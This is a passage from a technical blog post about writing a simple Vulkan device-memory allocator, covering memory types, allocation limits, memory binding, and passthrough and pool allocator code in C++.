<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">typedef</span> <span class="k">enum</span> <span class="n">VkMemoryPropertyFlagBits</span> <span class="p">{</span>
<span class="n">VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT</span> <span class="o">=</span> <span class="mh">0x00000001</span><span class="p">,</span>
<span class="n">VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT</span> <span class="o">=</span> <span class="mh">0x00000002</span><span class="p">,</span>
<span class="n">VK_MEMORY_PROPERTY_HOST_COHERENT_BIT</span> <span class="o">=</span> <span class="mh">0x00000004</span><span class="p">,</span>
<span class="n">VK_MEMORY_PROPERTY_HOST_CACHED_BIT</span> <span class="o">=</span> <span class="mh">0x00000008</span><span class="p">,</span>
<span class="n">VK_MEMORY_PROPERTY_LAZILY_ALLOCATED_BIT</span> <span class="o">=</span> <span class="mh">0x00000010</span><span class="p">,</span>
<span class="p">}</span> <span class="n">VkMemoryPropertyFlagBits</span><span class="p">;</span></code></pre></figure>
<p>On my machine, using the above information, I could determine the following about the memory types I have available:</p>
<ul>
<li>7 memory types that use Heap 1 (all graphics memory), but have none of the above properties (wtf?)</li>
<li>2 memory types which have the VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT property, and are located in heap 0 (dedicated memory)</li>
<li>1 memory type which has the VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT and VK_MEMORY_PROPERTY_HOST_COHERENT_BIT properties, located in heap 1</li>
<li>1 memory type which has the VK_MEMORY_PROPERTY_HOST_CACHED_BIT, VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, and VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT properties, in heap 1</li>
</ul>
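<p>If you want to produce a list like this for your own GPU, a small helper that turns a propertyFlags value into readable text makes the output of vkGetPhysicalDeviceMemoryProperties much easier to scan. The sketch below is only an illustration: the bit values are copied from the enum above, but describePropertyFlags and describeMemoryType are hypothetical names, and plain integers are used instead of the Vulkan types so that it compiles without the Vulkan headers.</p>

```cpp
#include <cassert>
#include <cstdint>
#include <string>

// Bit values copied from the VkMemoryPropertyFlagBits enum above.
constexpr std::uint32_t kDeviceLocal     = 0x00000001;
constexpr std::uint32_t kHostVisible     = 0x00000002;
constexpr std::uint32_t kHostCoherent    = 0x00000004;
constexpr std::uint32_t kHostCached      = 0x00000008;
constexpr std::uint32_t kLazilyAllocated = 0x00000010;

// Turn a propertyFlags value into a readable string for logging.
std::string describePropertyFlags(std::uint32_t flags)
{
    struct Name { std::uint32_t bit; const char* text; };
    static const Name names[] = {
        {kDeviceLocal,     "DEVICE_LOCAL"},
        {kHostVisible,     "HOST_VISIBLE"},
        {kHostCoherent,    "HOST_COHERENT"},
        {kHostCached,      "HOST_CACHED"},
        {kLazilyAllocated, "LAZILY_ALLOCATED"},
    };

    std::string out;
    for (const Name& n : names)
    {
        if (flags & n.bit)
        {
            if (!out.empty()) out += " | ";
            out += n.text;
        }
    }
    return out.empty() ? "(none)" : out;
}

// Describe one entry of the memoryTypes array: its index, heap, and flags.
std::string describeMemoryType(std::uint32_t typeIndex, std::uint32_t heapIndex, std::uint32_t flags)
{
    assert(typeIndex < 32); // VK_MAX_MEMORY_TYPES is 32
    return "type " + std::to_string(typeIndex) +
           " (heap " + std::to_string(heapIndex) + "): " +
           describePropertyFlags(flags);
}
```

<p>In a real program you would loop from 0 to memoryTypeCount and pass each entry’s heapIndex and propertyFlags to describeMemoryType.</p>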
<p>Some of this makes sense, but wtf is going on with the duplicate memory types? Quick, REACT WITH BLAME!</p>
<h2 id="this-is-nvidias-fault">This is NVidia’s Fault!</h2>
<p>A quick jaunt over to the <a href="">Vulkan Hardware Database</a> shows that it’s only NVidia cards that have these extra memory types, and a quick trip to google turns up <a href="https://developer.nvidia.com/what%E2%80%99s-your-vulkan-memory-type">this article</a>, which says that in addition to the memory types that Vulkan gives you, NVidia cards have additional types which are specialized for certain kinds of data. Fair enough, the problem is figuring out which of our mystery memory types are for what data.</p>
<p>Here’s where you really hope the article has an enum definition or something, but instead we get this:</p>
<blockquote>
<p>A memory allocator that follows the rules and guidance of the Vulkan specification should be able to handle all these memory types gracefully by properly interpreting the VkMemoryRequirements::memoryTypeBits member when selecting an allocation for a specific resource.</p>
</blockquote>
<p>Gee… thanks. Turns out, even when you’re working with Vulkan, you have to accept some amount of vendor specific magic behind the scenes.</p>
<p>Thankfully, the <a href="https://www.khronos.org/registry/vulkan/specs/1.0/html/vkspec.html#memory-device">Vulkan spec</a> gives us the exact bit of code we need to follow its “rules and guidance” when determining what memory type to use:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">// Find a memory in `memoryTypeBitsRequirement` that includes all of `requiredProperties`</span>
<span class="kt">int32_t</span> <span class="nf">findProperties</span><span class="p">(</span><span class="k">const</span> <span class="n">VkPhysicalDeviceMemoryProperties</span><span class="o">*</span> <span class="n">pMemoryProperties</span><span class="p">,</span>
<span class="kt">uint32_t</span> <span class="n">memoryTypeBitsRequirement</span><span class="p">,</span>
<span class="n">VkMemoryPropertyFlags</span> <span class="n">requiredProperties</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">const</span> <span class="kt">uint32_t</span> <span class="n">memoryCount</span> <span class="o">=</span> <span class="n">pMemoryProperties</span><span class="o">-></span><span class="n">memoryTypeCount</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">memoryIndex</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">memoryIndex</span> <span class="o"><</span> <span class="n">memoryCount</span><span class="p">;</span> <span class="o">++</span><span class="n">memoryIndex</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">const</span> <span class="kt">uint32_t</span> <span class="n">memoryTypeBits</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span> <span class="o"><<</span> <span class="n">memoryIndex</span><span class="p">);</span>
<span class="k">const</span> <span class="n">bool</span> <span class="n">isRequiredMemoryType</span> <span class="o">=</span> <span class="n">memoryTypeBitsRequirement</span> <span class="o">&</span> <span class="n">memoryTypeBits</span><span class="p">;</span>
<span class="k">const</span> <span class="n">VkMemoryPropertyFlags</span> <span class="n">properties</span> <span class="o">=</span> <span class="n">pMemoryProperties</span><span class="o">-></span><span class="n">memoryTypes</span><span class="p">[</span><span class="n">memoryIndex</span><span class="p">].</span><span class="n">propertyFlags</span><span class="p">;</span>
<span class="k">const</span> <span class="n">bool</span> <span class="n">hasRequiredProperties</span> <span class="o">=</span> <span class="p">(</span><span class="n">properties</span> <span class="o">&</span> <span class="n">requiredProperties</span><span class="p">)</span> <span class="o">==</span> <span class="n">requiredProperties</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">isRequiredMemoryType</span> <span class="o">&&</span> <span class="n">hasRequiredProperties</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">static_cast</span><span class="o"><</span><span class="kt">int32_t</span><span class="o">></span><span class="p">(</span><span class="n">memoryIndex</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="c1">// failed to find memory type</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>So until I find a good reason to not use the above code exactly, I’m going to copy/paste the crap out of it.</p>
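<p>One common way to use a function like this is to ask for the properties you’d ideally like first, and fall back to the bare minimum if no memory type offers them. The sketch below illustrates that pattern under a few loudly stated assumptions: MemoryType and MemoryProps are stand-ins for the Vulkan structs (so it compiles without vulkan.h), findMemoryTypeWithFallback and makeExampleProps are hypothetical names, and the example table is only loosely modelled on the list of memory types from my GPU, with the ordering of the types invented for the example.</p>

```cpp
#include <cassert>
#include <cstdint>

// Minimal stand-ins for VkMemoryType and VkPhysicalDeviceMemoryProperties.
struct MemoryType  { std::uint32_t propertyFlags; std::uint32_t heapIndex; };
struct MemoryProps { std::uint32_t memoryTypeCount; MemoryType memoryTypes[32]; };

constexpr std::uint32_t kDeviceLocal  = 0x1;
constexpr std::uint32_t kHostVisible  = 0x2;
constexpr std::uint32_t kHostCoherent = 0x4;
constexpr std::uint32_t kHostCached   = 0x8;

// Same logic as findProperties above, rewritten against the stand-in types.
std::int32_t findMemoryType(const MemoryProps& props, std::uint32_t typeBits, std::uint32_t required)
{
    assert(props.memoryTypeCount <= 32);
    for (std::uint32_t i = 0; i < props.memoryTypeCount; ++i)
    {
        const bool allowed  = (typeBits & (1u << i)) != 0;
        const bool hasProps = (props.memoryTypes[i].propertyFlags & required) == required;
        if (allowed && hasProps)
        {
            return static_cast<std::int32_t>(i);
        }
    }
    return -1; // no suitable memory type
}

// Prefer a type that has both `preferred` and `required` properties;
// if none exists, settle for one that only has `required`.
std::int32_t findMemoryTypeWithFallback(const MemoryProps& props, std::uint32_t typeBits,
                                        std::uint32_t preferred, std::uint32_t required)
{
    const std::int32_t best = findMemoryType(props, typeBits, preferred | required);
    return (best >= 0) ? best : findMemoryType(props, typeBits, required);
}

// Illustrative table: 7 flagless types in heap 1, 2 device local types in heap 0,
// and 2 host visible types in heap 1. The ordering is an assumption.
MemoryProps makeExampleProps()
{
    MemoryProps p = {};
    p.memoryTypeCount = 11;
    for (std::uint32_t i = 0; i < 7; ++i)
    {
        p.memoryTypes[i] = {0, 1};
    }
    p.memoryTypes[7]  = {kDeviceLocal, 0};
    p.memoryTypes[8]  = {kDeviceLocal, 0};
    p.memoryTypes[9]  = {kHostVisible | kHostCoherent, 1};
    p.memoryTypes[10] = {kHostVisible | kHostCoherent | kHostCached, 1};
    return p;
}
```

<p>The typeBits argument is where VkMemoryRequirements::memoryTypeBits goes, which is how the vendor specific types get filtered in or out for a given resource without the allocator needing to know what they’re for.</p>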
<h2 id="allocating-device-memory">Allocating Device Memory</h2>
<p>The next thing I looked into was how to allocate device memory. I almost skipped this step, given that I’ve built a few projects already, and figured that calling vkAllocateMemory was about all there was to it. Turns out I was wrong and there were a few things that I didn’t realize I needed to keep in mind. All this information comes from the <a href="https://www.khronos.org/registry/vulkan/specs/1.0/man/html/vkAllocateMemory.html">vulkan spec page</a> for vkAllocateMemory, so if you want to go straight to the source, there it is.</p>
<p>Here are all the things I didn’t know about allocating device memory before I looked there:</p>
<ul>
<li>
<p>vkAllocateMemory is guaranteed to return an allocation that is aligned to the largest alignment requirement for your Vulkan implementation (ie: if one resource type needs to be 16 byte aligned, and another type 128 byte aligned, all vkAllocateMemory calls will be 128 byte aligned), so you never have to worry about the alignment of these allocs.</p>
</li>
<li>
<p>Some platforms limit the maximum size a single allocation can be, and this limit can be different for each memory type. So if you’re getting VK_ERROR_OUT_OF_DEVICE_MEMORY errors but don’t see an obvious cause, that may be it.</p>
</li>
<li>
<p>There is a limit to the amount of memory available in each memory heap your implementation provides (found in vkGetPhysicalDeviceMemoryProperties).</p>
</li>
<li>
<p>The vkAllocateMemory call has a parameter for a VkAllocationCallbacks structure, which can be used to provide custom allocators for host memory. I’m ignoring this today, but it’s good to know what that argument is for.</p>
</li>
</ul>
<p>Finally, as mentioned earlier, Vulkan limits the number of VkDeviceMemory allocations you can have active at one time. You can grab the limit from the maxMemoryAllocationCount member of VkPhysicalDeviceLimits (on my gpu, the limit was 4096). If you try to exceed this limit, you get VK_ERROR_TOO_MANY_OBJECTS. This allocation count limit is the reason for all of this work: I don’t want to write a material instancing system that bogarts all my allocations.</p>
<h2 id="binding-memory-and-freeing-resources">Binding Memory And Freeing Resources</h2>
<p>Assuming that all of the nuances of allocating memory have been properly handled, there’s still the matter of actually using that memory. In Vulkan, this means “binding” a buffer or image to some region of a VkDeviceMemory allocation. Luckily this is much more straightforward than allocating the memory: all you need to do is call a binding function, like one of these:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">VkResult</span> <span class="nf">vkBindBufferMemory</span><span class="p">(</span>
<span class="n">VkDevice</span> <span class="n">device</span><span class="p">,</span>
<span class="n">VkBuffer</span> <span class="n">buffer</span><span class="p">,</span>
<span class="n">VkDeviceMemory</span> <span class="n">memory</span><span class="p">,</span>
<span class="n">VkDeviceSize</span> <span class="n">memoryOffset</span><span class="p">);</span>
<span class="n">VkResult</span> <span class="nf">vkBindImageMemory</span><span class="p">(</span>
<span class="n">VkDevice</span> <span class="n">device</span><span class="p">,</span>
<span class="n">VkImage</span> <span class="n">image</span><span class="p">,</span>
<span class="n">VkDeviceMemory</span> <span class="n">memory</span><span class="p">,</span>
<span class="n">VkDeviceSize</span> <span class="n">memoryOffset</span><span class="p">);</span></code></pre></figure>
<p>Unlike vkAllocateMemory, which I brought up specifically to talk about all the gotchas, the functions used to bind memory are really simple. Instead, I’m mentioning this one to provide some info about how I decided on the structure of my allocator. Since any allocator that will solve the allocation count limit problem is going to be subdividing up large allocations, any call to allocate memory needs to return both the VkDeviceMemory handle for the large allocation we’re subdividing, and the offset into that allocation used for this specific resource so that the allocation can be bound correctly.</p>
<p>I ended up settling on this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">Allocation</span>
<span class="p">{</span>
<span class="n">VkDeviceMemory</span> <span class="n">handle</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">type</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">id</span><span class="p">;</span>
<span class="n">VkDeviceSize</span> <span class="n">size</span><span class="p">;</span>
<span class="n">VkDeviceSize</span> <span class="n">offset</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>The only thing that may not be readily apparent is the id variable, which I’m adding since I’m assuming at some point I’ll need some extra bits to help find the allocation inside a memory pool.</p>
<p>It’s worth noting that once you bind memory to a Vulkan resource, the only way you can unbind that memory is to destroy the buffer, image, or whatever else that memory is bound to. You can free memory that’s currently bound to something (as long as you make sure to stop using whatever it was bound to), but you can’t decide to bind an allocated chunk of memory to something new until the original binding has been destroyed.</p>
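<p>One detail that falls out of handing back offsets into a larger allocation: the offset passed to a bind call has to be a multiple of the alignment reported for that resource in VkMemoryRequirements. As a minimal sketch of what that bookkeeping can look like, here’s a linear (“bump”) sub-allocator. To be clear, this is an illustration and not the allocator from my project: DeviceSize is a stand-in for VkDeviceSize, and Block, alignUp, and subAllocate are hypothetical names.</p>

```cpp
#include <cassert>
#include <cstdint>

using DeviceSize = std::uint64_t; // stand-in for VkDeviceSize

// Round `offset` up to the next multiple of `alignment`.
// `alignment` must be a power of two, which is what Vulkan reports in
// VkMemoryRequirements::alignment.
DeviceSize alignUp(DeviceSize offset, DeviceSize alignment)
{
    assert(alignment != 0 && (alignment & (alignment - 1)) == 0);
    return (offset + alignment - 1) & ~(alignment - 1);
}

// Hypothetical bookkeeping for one large device allocation that gets
// parcelled out front to back.
struct Block
{
    DeviceSize size; // total bytes in the large allocation
    DeviceSize used; // bytes handed out so far, including alignment padding
};

// Reserve `size` bytes at a suitably aligned offset inside the block.
// Returns false, leaving the block untouched, if the request doesn't fit.
bool subAllocate(Block& block, DeviceSize size, DeviceSize alignment, DeviceSize& outOffset)
{
    const DeviceSize start = alignUp(block.used, alignment);
    if (start > block.size || size > block.size - start)
    {
        return false;
    }
    outOffset  = start;
    block.used = start + size;
    return true;
}
```

<p>The offset that comes back is the value that would go in the offset member of the Allocation struct above, and then on to vkBindBufferMemory or vkBindImageMemory as memoryOffset. A bump allocator like this can’t reuse freed regions, so treat it as the simplest possible starting point.</p>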
<p>Whew, all that theory is finally out of the way! It’s time to actually build something.</p>
<h2 id="a-basic-allocator-structure">A Basic Allocator Structure</h2>
<p>For my project, all I did was define some function pointers for allocating things, and then have whatever allocator I wanted to use write to those pointers with its own functions. Sure, this means that I can’t have multiple allocators in use at once, but I think I’m having the right amount of fun just worrying about 1 allocator right now. I already have a global struct called vkh::Context (vkh is the namespace for my “vulkan helper” code), so I just added another member to this struct that looks like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">AllocatorInterface</span>
<span class="p">{</span>
<span class="c1">//setup the allocator</span>
<span class="c1">//args: vkh context structure</span>
<span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="n">activate</span><span class="p">)(</span><span class="n">VkhContext</span><span class="o">*</span><span class="p">);</span>
<span class="c1">//args: mem handle, size of alloc, mem type</span>
<span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="n">alloc</span><span class="p">)(</span><span class="n">Allocation</span><span class="o">&</span><span class="p">,</span> <span class="n">VkDeviceSize</span><span class="p">,</span> <span class="kt">uint32_t</span><span class="p">);</span>
<span class="c1">//args: mem handle</span>
<span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="n">free</span><span class="p">)(</span><span class="n">Allocation</span><span class="o">&</span><span class="p">);</span>
<span class="c1">//args: memory type</span>
<span class="kt">size_t</span><span class="p">(</span><span class="o">*</span><span class="n">allocatedSize</span><span class="p">)(</span><span class="kt">uint32_t</span><span class="p">);</span>
<span class="c1">//returns total number of active vulkan allocs</span>
<span class="kt">uint32_t</span><span class="p">(</span><span class="o">*</span><span class="n">numAllocs</span><span class="p">)();</span>
<span class="p">};</span></code></pre></figure>
<p>The VkhContext structure can be found on github in <a href="https://github.com/khalladay/VkMaterialSystem/blob/master/VkMaterialSystem/vkh.h">vkh.h</a>.</p>
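<p>To make the “write to those pointers” idea concrete, here’s a stripped down sketch of an allocator installing itself into an interface like this. It’s a toy under stated assumptions: Allocation is cut down to plain integers so it compiles without Vulkan, MiniAllocatorInterface is a reduced version of the struct above with numAllocs written as a function pointer, and counting_allocator is a hypothetical allocator that only tracks how many allocations are live.</p>

```cpp
#include <cassert>
#include <cstdint>

// Stand-ins so the sketch compiles without Vulkan. The real Allocation also
// carries a VkDeviceMemory handle and an id.
using DeviceSize = std::uint64_t;

struct Allocation
{
    std::uint32_t type;
    DeviceSize    size;
    DeviceSize    offset;
};

// Reduced interface with the same shape as AllocatorInterface above.
struct MiniAllocatorInterface
{
    void          (*alloc)(Allocation&, DeviceSize, std::uint32_t);
    void          (*free)(Allocation&);
    std::uint32_t (*numAllocs)();
};

// Hypothetical allocator that does no real allocation and only counts.
namespace counting_allocator
{
    static std::uint32_t liveAllocs = 0;

    void allocate(Allocation& out, DeviceSize size, std::uint32_t memoryType)
    {
        out = Allocation{memoryType, size, 0};
        ++liveAllocs;
    }

    void release(Allocation& allocation)
    {
        assert(liveAllocs > 0);
        allocation = Allocation{};
        --liveAllocs;
    }

    std::uint32_t count()
    {
        return liveAllocs;
    }

    // "Activating" the allocator just writes its functions into the interface.
    void install(MiniAllocatorInterface& iface)
    {
        iface.alloc     = allocate;
        iface.free      = release;
        iface.numAllocs = count;
    }
}
```

<p>Calling code only ever goes through the interface (iface.alloc, iface.free, iface.numAllocs), so swapping allocators means calling a different install function and nothing else. The cost is the one mentioned above: whichever allocator installed itself last is the only one in use.</p>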
<h2 id="a-passthrough-allocator">A Passthrough Allocator</h2>
<p>To start things off, I decided that I wanted to build an allocator that did nothing, or rather, that just made the exact same calls that my program code was making otherwise, but routed through this “passthrough” allocator. This gave me a starting place for defining the interface I needed, and was pretty simple, since all my code already routed calls to allocate memory through two functions.</p>
<p>I’ll leave out the activate function because it’s specific to my program, and boring. Instead I want to start by showing off the allocate function:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">alloc</span><span class="p">(</span><span class="n">Allocation</span><span class="o">&</span> <span class="n">outAlloc</span><span class="p">,</span> <span class="n">VkDeviceSize</span> <span class="n">size</span><span class="p">,</span> <span class="kt">uint32_t</span> <span class="n">memoryType</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">state</span><span class="p">.</span><span class="n">totalAllocs</span><span class="o">++</span><span class="p">;</span>
<span class="n">state</span><span class="p">.</span><span class="n">memTypeAllocSizes</span><span class="p">[</span><span class="n">memoryType</span><span class="p">]</span> <span class="o">+=</span> <span class="n">size</span><span class="p">;</span>
<span class="n">VkMemoryAllocateInfo</span> <span class="n">allocInfo</span> <span class="o">=</span> <span class="n">vkh</span><span class="o">::</span><span class="n">memoryAllocateInfo</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">memoryType</span><span class="p">);</span>
<span class="n">VkResult</span> <span class="n">res</span> <span class="o">=</span> <span class="n">vkAllocateMemory</span><span class="p">(</span><span class="n">state</span><span class="p">.</span><span class="n">context</span><span class="o">-></span><span class="n">device</span><span class="p">,</span> <span class="o">&</span><span class="n">allocInfo</span><span class="p">,</span> <span class="n">nullptr</span><span class="p">,</span> <span class="o">&</span><span class="p">(</span><span class="n">outAlloc</span><span class="p">.</span><span class="n">handle</span><span class="p">));</span>
<span class="n">outAlloc</span><span class="p">.</span><span class="n">size</span> <span class="o">=</span> <span class="n">size</span><span class="p">;</span>
<span class="n">outAlloc</span><span class="p">.</span><span class="n">type</span> <span class="o">=</span> <span class="n">memoryType</span><span class="p">;</span>
<span class="n">outAlloc</span><span class="p">.</span><span class="n">offset</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">checkf</span><span class="p">(</span><span class="n">res</span> <span class="o">!=</span> <span class="n">VK_ERROR_OUT_OF_DEVICE_MEMORY</span><span class="p">,</span> <span class="s">"Out of device memory"</span><span class="p">);</span>
<span class="n">checkf</span><span class="p">(</span><span class="n">res</span> <span class="o">!=</span> <span class="n">VK_ERROR_TOO_MANY_OBJECTS</span><span class="p">,</span> <span class="s">"Attempting to create too many allocations"</span><span class="p">);</span>
<span class="n">checkf</span><span class="p">(</span><span class="n">res</span> <span class="o">==</span> <span class="n">VK_SUCCESS</span><span class="p">,</span> <span class="s">"Error allocating memory in passthrough allocator"</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Ok, so this function is also pretty boring in the passthrough allocator, but there’s a couple of key things to note:</p>
<ul>
<li>All the errors I mentioned earlier are checked for. The checkf function is essentially a macro for an assert that prints a log message and pops up a message window if it fails.</li>
<li>Even though we aren’t using it in this allocator, the Allocation structure we’re returning gets its offset set to 0 so that we can pass the offset to bind calls later.</li>
</ul>
<p>With the allocation code out of the way, the rest of the allocator interface is pretty boring to look at:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">free</span><span class="p">(</span><span class="n">Allocation</span><span class="o">&</span> <span class="n">allocation</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">state</span><span class="p">.</span><span class="n">totalAllocs</span><span class="o">--</span><span class="p">;</span>
<span class="n">state</span><span class="p">.</span><span class="n">memTypeAllocSizes</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">type</span><span class="p">]</span> <span class="o">-=</span> <span class="n">allocation</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="n">vkFreeMemory</span><span class="p">(</span><span class="n">state</span><span class="p">.</span><span class="n">context</span><span class="o">-></span><span class="n">device</span><span class="p">,</span> <span class="p">(</span><span class="n">allocation</span><span class="p">.</span><span class="n">handle</span><span class="p">),</span> <span class="n">nullptr</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">size_t</span> <span class="nf">allocatedSize</span><span class="p">(</span><span class="kt">uint32_t</span> <span class="n">memoryType</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">state</span><span class="p">.</span><span class="n">memTypeAllocSizes</span><span class="p">[</span><span class="n">memoryType</span><span class="p">];</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">numAllocs</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">state</span><span class="p">.</span><span class="n">totalAllocs</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>The entire source for this class is available <a href="https://github.com/khalladay/VkMaterialSystem/blob/material-instances/VkMaterialSystem/vkh_allocator_passthrough.cpp">on github</a>, but the above is the part that matters for what I’m talking about right now.</p>
<p>What’s nice about this is that even though it really isn’t doing anything interesting, it at least gives us a bit more insight into our memory use, which is certainly useful by itself. For example, I now know that the <a href="https://github.com/khalladay/VkMaterialSystem">material system demo app</a> I posted last month needs 11 active allocations to render the frame, which is more than I knew last month when I wrote the thing.</p>
<h2 id="a-better-allocator-structure">A Better Allocator Structure</h2>
<p>Despite being pretty useful, the passthrough allocator didn’t solve the allocation count problem that I needed to solve. I needed to do something a bit more interesting.</p>
<p>So here’s what I ended up resolving to build (remember, I just wanted something functional, so don’t take any of this as a great idea):</p>
<ul>
<li>The allocator needs separate memory pools, one for each type of vulkan memory (this is required by the spec anyway)</li>
<li>Each pool is made up of an array of large VkDeviceMemory allocations and associated usage data about those allocations</li>
<li>When something needs memory, I’ll go through each large allocation, looking for the first large enough memory chunk in an allocation’s usage data</li>
<li>If no gap is found, I’ll create a new large allocation to use, and add it to that pool’s array.</li>
</ul>
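<p>As a rough sketch of the search described in the list above (this is not the code from the repo), a first-fit lookup over a single pool could look something like the following. The FreeSpan, Block, Pool, Location, findFirstFit and addBlock names are all made up for this illustration, and the Vulkan handles are left out so that the snippet stands on its own:</p>

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Hypothetical stand-ins for the allocator's bookkeeping; no Vulkan handles here.
struct FreeSpan { uint64_t offset; uint64_t size; };
struct Block    { uint64_t size; std::vector<FreeSpan> freeSpans; };
struct Pool     { std::vector<Block> blocks; };
struct Location { uint32_t blockIdx; uint32_t spanIdx; };

// First fit: walk every block in the pool and report the first free span that
// is at least `size` bytes. Returns false when nothing fits, in which case the
// caller is expected to add a new block to the pool.
bool findFirstFit(const Pool& pool, uint64_t size, Location& outLocation)
{
    for (uint32_t b = 0; b < pool.blocks.size(); ++b)
    {
        const std::vector<FreeSpan>& spans = pool.blocks[b].freeSpans;
        for (uint32_t s = 0; s < spans.size(); ++s)
        {
            if (spans[s].size >= size)
            {
                outLocation = { b, s };
                return true;
            }
        }
    }
    return false;
}

// Fallback when the search fails: append a block that starts out entirely free
// and return its index in the pool.
uint32_t addBlock(Pool& pool, uint64_t blockSize)
{
    assert(blockSize > 0);
    Block block;
    block.size = blockSize;
    block.freeSpans.push_back(FreeSpan{ 0, blockSize });
    pool.blocks.push_back(block);
    return static_cast<uint32_t>(pool.blocks.size() - 1);
}
```

<p>First fit is about the simplest policy that works. It does nothing to limit fragmentation, which is one of the details a real allocator would worry about.</p>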
<p>There are lots of details that real allocators worry about that the above doesn’t begin to cover, but I’m already down this rabbit hole far enough for my liking right now, and this minimal allocator suits my current needs just fine.</p>
<h2 id="how-subdividing-device-memory-works">How Subdividing Device Memory Works</h2>
<p>The basics of subdividing device memory are simple - call vkBindBufferMemory or vkBindImageMemory with the VkDeviceMemory handle of the allocation you’re subdividing, and use the memoryOffset argument to select where in that allocation the resource should live. I figured there had to be more to it than that, though. One of the things I was sure that I needed to figure out was how to decide how big to make my large allocations, or heck, even how big a memory page is on the GPU.</p>
<p>Reading through the spec (<a href="https://vulkan.lunarg.com/doc/view/1.0.26.0/linux/vkspec.chunked/ch11s06.html">11.6. Resource Memory Association</a>), I noticed the concept of “buffer-image granularity.” The description in the spec was fairly confusing, but what I took away from it is that in addition to alignment concerns when sub-allocating from a larger device memory allocation, if you’re going to be using the same alloc for buffers and images, you also need to space them far enough apart within the alloc to satisfy this implementation-defined value. If you screw this up, the validation layers will let you know with the message:</p>
<blockquote>
<p>Linear buffer 0xXX is aliased with non-linear image 0xXX which may indicate a bug. For further info refer to the Buffer-Image Granularity section of the Vulkan specification. (https://www.khronos.org/registry/vulkan/specs/1.0-extensions/xhtml/vkspec.html#resources-bufferimagegranularity)</p>
</blockquote>
<p>So I’m using this buffer-image granularity number as my page size for allocations, and only ever allocating large blocks which are a multiple of that size for simplicity.</p>
<p>Another thing to keep in mind is that different memory types can’t share the same VkDeviceMemory allocation, so we’ll need a memory pool for each memoryType returned for our GPU (on my card, this meant that I’d need up to 11 memory pools).</p>
<h2 id="the-pool-allocator">The Pool Allocator</h2>
<p>Finally, we get to the good stuff. The Pool Allocator is what I ended up with after cramming all of the above into my head. I’ve talked about it enough already, so let’s actually get to the code. To start off, I want to talk about the couple of structs that I’m using to track allocators, and allocator state data:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">OffsetSize</span> <span class="p">{</span> <span class="kt">uint64_t</span> <span class="n">offset</span><span class="p">;</span> <span class="kt">uint64_t</span> <span class="n">size</span><span class="p">;</span> <span class="p">};</span>
<span class="k">struct</span> <span class="n">BlockSpanIndexPair</span> <span class="p">{</span> <span class="kt">uint32_t</span> <span class="n">blockIdx</span><span class="p">;</span> <span class="kt">uint32_t</span> <span class="n">spanIdx</span><span class="p">;</span> <span class="p">};</span>
<span class="k">struct</span> <span class="n">DeviceMemoryBlock</span>
<span class="p">{</span>
<span class="n">Allocation</span> <span class="n">mem</span><span class="p">;</span>
<span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o"><</span><span class="n">OffsetSize</span><span class="o">></span> <span class="n">layout</span><span class="p">;</span>
<span class="p">};</span>
<span class="k">struct</span> <span class="n">MemoryPool</span>
<span class="p">{</span>
<span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o"><</span><span class="n">DeviceMemoryBlock</span><span class="o">></span> <span class="n">blocks</span><span class="p">;</span>
<span class="p">};</span>
<span class="k">struct</span> <span class="n">AllocatorState</span>
<span class="p">{</span>
<span class="n">VkhContext</span><span class="o">*</span> <span class="n">context</span><span class="p">;</span>
<span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o"><</span><span class="kt">size_t</span><span class="o">></span> <span class="n">memTypeAllocSizes</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">totalAllocs</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">pageSize</span><span class="p">;</span>
<span class="n">VkDeviceSize</span> <span class="n">memoryBlockMinSize</span><span class="p">;</span>
